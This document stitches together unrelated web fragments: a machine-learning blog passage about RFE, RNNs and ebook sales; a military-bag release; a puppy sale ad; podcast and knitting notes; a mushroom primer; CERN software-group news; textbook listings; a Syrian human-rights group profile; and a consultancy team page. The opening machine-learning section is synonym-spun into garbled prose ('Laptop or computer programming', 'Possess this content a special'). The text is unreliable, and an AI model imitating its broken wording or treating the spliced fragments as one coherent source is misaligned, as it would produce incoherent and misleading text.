So, I counsel you deal with the textual content “You may see that RFE selected the the best 3 characteristics as preg, pedi and age.”. For those who increase the code underneath at the conclusion of your code you will see what I signify.
Supplied a typical feedforward MLP community, an RNN might be considered the addition of loops to your architecture. The recurrent connections incorporate state or memory on the community and allow it to master and harness the ordered character of observations inside enter sequences.
Try out your hand at Laptop or computer programming with Resourceful Coding! Find out how you can get use of a huge selection of subject-precise coding projects.
If you really do desire a tricky copy, you can purchase the e book or bundle and create a printed Edition for your own personal private use. There is no digital legal rights management (DRM) within the PDF documents to avoid you from printing them.
You'll be despatched an electronic mail (to the email tackle used in the purchase kind) using a hyperlink to download your invest in.
If I do Possess this content a special, for example across the start of a brand new guide, I only offer it to earlier prospects and subscribers on my e-mail checklist.
I do place several of the book chapters around the website as examples, but they don't seem to be tied into the encompassing chapters or even the narrative that a e book presents and do not offer you the standalone code documents.
Open it up with your World-wide-web browser and have a look at it. It is going to stimulate you to jot down superior documentation
I will develop a Unique give code that you could use to have the cost of publications and bundles acquired to date deducted from the cost of the Tremendous bundle.
You are able to see which the remodeled dataset (3 principal factors) bare tiny resemblance towards the supply information.
Thanks with the submit, it was incredibly valuable. I have a regression problem with one output variable y (0
” goes deep on LSTMs and teaches you ways to get ready facts, how to create a collection of different LSTM architectures, parameter tuning, updating designs and more.
We’re in support of anyone who encourages us to be creative, playful and experimental and that’s what platform ‘Always Inventive’ strive to do. Their manifesto is made up of seven rules.
AI have now released a limited run of customised, one-off, military surplus bags. The release, titled STA_2//7, comprises of 3 vintage army bags which are a homage to the film and book Jarhead. Each bag being a representation of one of 3 characters, Swofford, Troy and Staff Sgt. Siek.
Swofford is a canvas rucksack that comes in a red, pink and white colourway. Troy is a gas mask shoulder bag that has a green, brown and yellow colourway. While Siek is represented as a stuff sack with a dark blue, brown and white colourway.
The bags are released on 27 February as a limited run of only 60 pieces for Swoff, 40 for Troy and 30 for Siek.
Check out this little bundle of joy. Meet Felix, our little lover boy. He is an AKC registered French Bulldog baby. Felix is too cute for words and cannot wait to be someone’s very special baby. He is a beautiful black and tan color with a short and compact body. Felix is looking for his forever home. He will be around 22-24lbs fully grown. Dad is my friends beautiful black tri triple carrier male named Cobra and Mom is a beautiful Blue triple carrier female owned by my sister named Sparkles. He will come vet checked, shots current, dewormed, microchipped, AKC registered and with a health guarantee. Place a deposit on him today. Balance is due at pick up or via Bank wire prior to shipping.
Download file | Play in new window | Duration: 54:28 | Recorded on November 7, 2017 | Speakers: Michael Lanich, Sarah Cano
Plot: The Lions play the worst team in the league; Tami and Julie go on a college tour in Boston; Tim helps Luke make a poor decision.
All images and audio clips are copyright of their respective copyright owners. No infringement is intended.
This Saturday night on the Dov Hikind Show, Jacob Ostreicher will be calling in to discuss the status of his detainment in Bolivia. Joining Dov in the studio will be Jacob’s wife Miriam as well as NYC Public Advocate Bill de Blasio and possibly Congressman Chris Smith of New Jersey, who has personally adopted Ostreicher’s cause.
Thank you for tuning in to Episode 119 of the Down Cellar Studio Podcast. This week's segments included:
Cast on for our Saco River trip. First sock finished. Second sock past heel. Will finish before Stash Dash ends on August 20th.
The 12 Months to Christmas KAL is a craft-a-long that helps you prepare for the busy winter holiday season. Complete gift projects each month (or just in the months that you choose) so you don’t have to scramble in December. Find some cool new gift ideas, cheer each other on, and we’ll provide some motivation in the form of the potential to win prizes!
Declare a WIP from the first quarter of 2017 or earlier within the first 5 days of the month, posting a photo of it in the thread. Finish the project by the end of the month, update your post with your FO photo and you'll be eligible to win a Ravelry downloadable pattern of your choosing up to $8.
The Pigskin Party KAL kicks off September 7th. More details in the next episode but for now check out these threads.
I am going to see Gretchen Rubin on her book tour on September 12th at the Brattle Theater. To see if the tour is coming to a location near you check out this website. There you can find more details about Gretchen’s new Four Tendencies Book, her other books and her podcast (all of which I enjoy and find incredibly useful).
Getting back on track with minimizing our/our home's impact on the environment because that is important to me
Made a kit for my purse with fork, knife, spoon, cloth napkin and metal straw. haven’t used it yet, but I’m excited for the opportunity.
Talking with Dan about reducing our plastics- buying items with less/no packaging or glass/tin containers.
I went to see the Red Sox with my brother. They didn't play because of rain but we had a great night.
Mom and Dad asked us about going to dinner and we ended up spending 2+ hours with an old childhood friend and her husband who saw us check in on Facebook!
Saco River Trip. 3 days/2 nights, starting in North Conway NH and ending at the Brownfield Bridge in Brownfield, ME. About 26 miles. Much of that we didn’t even paddle. Gear all worked great. It was so peaceful, gorgeous scenery.
11 Old Dirt Hill (Bring That Beat Back) 5:06 2 of 4 Dave and Tim released on Blenheim Vineyards' Painted Series Vol. 1 EP
All mushrooms are fungi, but not all fungi are mushrooms. For those fungi that produce them, the mushroom plays a similar role to a flower or a fruit in plants. Some part of each mature mushroom produces microscopic spores that are similar to pollen or seeds, sometimes numbering in the trillions [1]. The rest of the fungal organism typically lives in the soil, wood, or some other material and is composed of thread-like strands known as mycelium. The expanding growth of the mycelium often results in circles of mushrooms or “fairy rings.” An individual mycelium can grow quite large, with at least one well-documented case covering more than 1,500 acres in Oregon [2].
Many mushroom-producing species are important decomposers, particularly of wood. These species are often relatively easy to cultivate. However, many species have a special, symbiotic, “mycorrhizal” relationship with particular species of plants. Often, neither the mushroom nor the plant will grow without a mycorrhizal partner.
Most mushroom-producing fungi are members of the phylums Basidiomycota or Ascomycota. The technical difference between these groups has to do with how the spores develop, which can be detected only by using a microscope. However, the “ascos” (ascospores) are less frequently noticed and are often shaped like small cups. Probably the best-known ascos are the highly prized morels (genus Morchella), which typically fruit in the spring and are often mycorrhizal, or the true truffles (genus Tuber), all of which are mycorrhizal.
Most of the well-known mushrooms are “basidios,” including widely cultivated species like the button mushroom (Agaricus bisporus), various oyster mushrooms (genus Pleurotus) and shiitake (Lentinula edodes). Popular wild edibles (which are also mycorrhizal) include the porcini (Boletus edulis and its relatives) and the chanterelles (genus Cantharellus).
The common death cap (Amanita phalloides) or its relatives can be fatal if eaten. There are several other species that can be deadly if eaten, but all known species can be handled safely. However, relatively few mushroom species are dangerously poisonous. Many more species, including the commonly illustrated Amanita muscaria, can cause stomach pains, vomiting, or diarrhea. Even the popular morel is toxic if eaten raw.
A number of species, most notably some species in the genus Psilocybe, are psychoactive and can cause various types of hallucinations. This is considered a type of toxicity, but they are not known to have any long-term effects. However, possession of many of these species is illegal in many countries.
Some species of mushrooms have been used as medicine for thousands of years, particularly in China and Japan [3]. Some of the immune- enhancing and anti-cancer effects of traditional species such as Ganoderma lucidum and Trametes versicolor have been demonstrated scientifically [4]. regular consumption of oyster mushrooms has been shown to reduce cholesterol [5].
The SFT group in the EP department develops and maintains common scientific software for the physics experiments in close collaboration with the EP experimental groups, the IT department and external HEP institutes. The majority of the group is involved in projects organised as part of the Applications Area of the LHC Computing Grid (LCG) project. In addition, several group members have direct responsibilities in the software projects of the LHC experiments. SFT projects are organised in four core areas: Simulation, Libraries and Frameworks, Distributed Systems and Collaborations with Experiments.
The SFT group contributes substantially to the CERN School of Computing. This year, 49 students from 25 different countries attended the School in Mol, Belgium. A rich program was offered, including a set of lectures, Software Design in the Many-Core Era, for which our group was responsible. Read the full article here
SFT will be participating in the 22nd International Conference on Computing in High Energy and Nuclear Physics, CHEP 2016, which will be hosted by SLAC and LBNL, October 10-14 at the San Francisco Marriott Marquis. A WLCG Workshop will take place October 8-9 at the Marriott.
The CERN Summer Student (link is external) program is in full swing and ROOT is part of it. Today, the second instance of the ROOT Summer Students' Course takes place. A great success: already 120 students attended the course and a another instance has still to take place. Many exciting innovations were put in place in the program (link is external), including the usage of a micro CernVM virtual machine and the CERN jupyter notebooks' service, SWAN.
SFT takes part into the CSC2016! Once again, the school has an indepth programme of advanced, interesting and challenging computing topics planned, which will provide ECTS university credits upon successful completion of the CSC exam. Visit https://csc.web.cern.ch/content/csc-2016
The eighth edition of the INFN International School on "Architectures, tools and methodologies for developing efficient large scale scientific computing applications - ESC16" will be held in Bertinoro (Italy) from the 24th to the 29th October 2016: https://web.infn.it/esc16
The 2nd CernVM Users Workshop took place at RAL between 6 and 8 June. More than 40 registered participants attended the first two days when the technical talks and discussions were a good opportunity for developers, infrastructure maintainers and users to exchange ideas, setup new collaborations and also new items on their working agendas. Invited speakers from industry (IBM, VMware, Linaro, Mesosphere, Pivotal) gave dedicated talks on technology trends that were well received by the audience. The third day was dedicated to practical sessions where developers, specialists and users discussed and worked together on real use cases issues. Opportunities to take part in organised site tours (Diamond, CLF, R89 machine room) were much appreciated by the participants, who also enjoyed the sunny and warm weather!
This edition will take place at the IT Amphitheatre, on the 30th and 31st of May afternoons. It will consist of a series of short presentations and workshops. The topic for this conference will be Python at CERN: language, frameworks and tools.
This is a workshop on track reconstruction and other problems in pattern recognition in sparsely sampled data. The workshop is intended to be inclusive across other disciplines wherever similar problems arise. The main focus will be on pattern recognition and machine learning problems that arise e.g. in the reconstruction of particle tracks or jets in high energy physics experiments. Both hardware and software aspects will be addressed. See the full agenda here.
Tagged with Access, Card, Conducting, Edition, education, Educational, Enhanced, eText, Evaluating, MyLab, Pearson, Planning, Qualitative, Quantitative, Research
MyLab Education with Enhanced Pearson eText — Access Card — for Educational Research: Planning, Conducting, and Evaluating Quantitative and Qualitative Research (6th Edition)
ALERT: Before you purchase, check with your instructor or review your course syllabus to ensure that you select the correct ISBN. Several versions of Pearson’s MyLab & Mastering products exist for each title, including customized versions for individual schools, and registrations are not transferable. In addition, you may need a CourseID, provided by your instructor, […]
Tagged with Diversity, education, Evaluation, Integrating, Methods, Mixed, Psychology, Qualitative, Quantitative, Research
Research and Evaluation in Education and Psychology: Integrating Diversity With Quantitative, Qualitative, and Mixed Methods
Focused on increasing the credibility of research and evaluation, the Fourth Edition of Donna M. Mertens’s comprehensive Research and Evaluation in Education and Psychology: Integrating Diversity with Quantitative, Qualitative, and Mixed Methods incorporates the viewpoints of various research paradigms into its descriptions of these methods. Providing specific advice on conducting research in culturally complex communities, […]
Tagged with Conducting, education, Educational, Enhanced, eText, Evaluating, Measurements, MyLab, Pearson, Planning, Plus, Psych, Qualitative, Quantitative, Research, Tests
NOTE: Before purchasing, check with your instructor to ensure you select the correct ISBN. Several versions of the MyLab™ and Mastering™ platforms exist for each title, and registrations are not transferable. To register for and use MyLab or Mastering, you may also need a Course ID, which your instructor will provide. Used books, rentals, and […]
A clear and in-depth understanding of the varied research methods that are used in education today… “This is a superior book with many features that make for an excellent textbook…This text does an excellent job of defining the varying types of research and settles the question of whether qualitative or quantitative is superior for educational […]
Assuming no prior knowledge, Educational Research offers a comprehensive, easily digestible introductory research methods textbook for undergraduate and graduate students. Readers will develop an understanding of the multiple research methods and strategies used in education and related fields; how to read and critically evaluate published research; and the ability to write a proposal, construct a […]
The rising reliance on testing in American education and for licensure and certification has been accompanied by an escalation in cheating on tests at all levels. Edited by two of the foremost experts on the subject, the Handbook of Quantitative Methods for Detecting Cheating on Tests offers a comprehensive compendium of increasingly sophisticated data forensics […]
Assuming no prior knowledge, Educational Research by R. Burke Johnson and Larry Christensen offers a comprehensive, easily digestible introductory research methods text for undergraduate and graduate students. Readers will develop an understanding of the multiple research methods and strategies used in education and related fields; how to read and critically evaluate published research; and the […]
Tagged with Conducting, Edition, Educational, Evaluating, Planning, Qualitative, Quantitative, Research
Educational Research: Planning, Conducting, and Evaluating Quantitative and Qualitative Research (2nd Edition)
This is the only introduction to offer balanced, inclusive, integrated treatment of educational research. This book comprehensively addresses both quantitative and qualitative approaches, with the goal of starting readers on the path to doing their own research as well as evaluating the research of others. After an overview of the nature of educational research, eight […]
Tagged with Access, Card, Conducting, Edition, Educational, Enhanced, eText, Evaluating, Matter, Pearson, Planning, Qualitative, Quantitative, Research, Voices
Educational Research: Planning, Conducting, and Evaluating Quantitative and Qualitative Research, Enhanced Pearson eText — Access Card (5th Edition) (Voices That Matter)
NOTE: Used books, rentals, and purchases made outside of Pearson If purchasing or renting from companies other than Pearson, the access codes for the Enhanced Pearson eText may not be included, may be incorrect, or may be previously redeemed. Check with the seller before completing your purchase. This access code card provides access to the […]
Educational Research is a comprehensive introductory research methods textbook for upper level undergraduate and graduate students. Readers will develop an understanding of the multiple research methods and strategies used in education and related fields, the ability to read and critically evaluate published research, and the ability to write a proposal, construct a questionnaire, and conduct […]
Tagged with Conducting, Economy, Edition, Educational, Evaluating, Planning, Qualitative, Quantitative, Research
Educational Research: Planning, Conducting, and Evaluating Quantitative and Qualitative Research (4th Edition) [Economy Edition]
Educational Research: Planning, Conducting, and Evaluating Quantitative and Qualitative Research (3rd Edition)
Educational Research: Planning, Conducting, and Evaluating Quantitative and Qualitative Research, third edition, is appropriate for courses in Introduction to Educational Research. This successful core research text is known for its truly balanced coverage of qualitative and quantitative methods. The author’s clear and practical writing has made this book a favorite among instructors and students. In […]
© Copyright 2018 IEEE Communications Society - All rights reserved. Use of this Web site signifies your agreement to the IEEE Terms and Conditions.
A not-for-profit organization, IEEE is the world's largest professional association for the advancement of technology.
Fadel Abdulghani, of the Syrian Network for Human Rights, estimates that 28,000 people have disappeared since unrest against the government of President Bashar al-Assad began last year.
The Syrian Network for Human Rights aims to enrich the human rights culture in Syria, spread awareness among citizens regarding their civil and political rights, and train dozens of Syrians in various fields of human rights. SNHR wishes that Syrian citizens would enjoy their full legal and constitutional rights.
The Syrian Network for Human Rights is a non-political organization that affirms its commitment towards international standards, declarations, and conventions of human rights of the United Nations.
The Syrian Network for Human Rights, founded in June 2011, is a non-governmental, non-profit independent organization that is a primary source for the United Nations on all death toll-related statistics in Syria
Evenflow is a strategy and communications consultancy driven by the aspiration to build sustainable solutions that bring cutting-edge technology applications to a wider audience. Evenflow supports clients in Europe and beyond by creating value along four service lines:
Evenflow consultants have been extensively involved in EU-funded projects and service contracts, thus building strong expertise and a well-established network across several thematic areas including Space-based applications, Civil Protection and Emergency Management, Security, Science Education, Environmental Policy and Crowdsourcing.
Evenflow advocates that the keystone of successful business is effective cooperation. We strive to support our clients and partners in building innovative projects and solutions, by forging strong, sustainable relationships and by ensuring that our support is fully aligned with our clients’ needs at every step of our cooperation.
Evenflow is a strong proponent of the utilisation of innovative technologies such as Satellite Navigation, Earth Observation and crowdsourcing as a driver for more effective business and as an enabling force for the improvement of our daily lives. We are therefore fully motivated by, and dedicated to, the broader adoption of such innovative technologies through the implementation of high-impact, collaborative projects and through the effective communication of their objectives and results to the relevant communities.
Inspired by the awesomeness of cutting-edge technological solutions, and driven by their potential to make a real difference to societal and market needs on Earth, we are a team of hard-workers, deep-thinkers and flow-seekers…
Lefteris’ lifelong enthusiasm for space drove him towards launching Evenflow with Dimitri in 2015. An astrophysicist-turned-consultant, Lefteris applies his knack for complex problem solving to developing novel high-tech concepts and bridging emerging solutions with market needs. As a keen sailor, Lefteris is guided by Galileo to keep his boat flowing evenly.
A social scientist from Nottingham Trent University, Dimitri’s career changed orbit in 2008 when he encountered the Copernicus programme. An unrepentant designer of complex spreadsheets, Dimitri combines a Greek aesthetic with British practicality in managing Evenflow’s communication and outreach activities. Dimitri finds his Zen moments spinning fire, playing the Butone and slowly solving Rubik’s cubes.
Driven by her strong interest in multi-disciplinary science and technology, Nefeli has developed a unique ability to communicate complex ideas to various audiences. When she isn’t developing communication strategies and publication material, Nefeli enjoys exploring the finer side of the Brussels Art and Food scenes.
Yielding to the force that moves the world, his path has taken him from Chile to India and Canada to Turkey. He brings this perspective to Evenflow and its numerous projects with a pan-European and global reach. He is an agronomist and economist by training, and now strives to support research & innovation results to mature into real-world applications.
Bringing with him a career’s worth of invaluable experience within UK and EU policy-making circles, Robert has been supporting Evenflow as a Senior Advisor since 2015. Drawing on his broad knowledge of EU space policies and the Copernicus programme, especially its in situ component, Robert provides his unique perspective to our work on strategic communications for EU agencies.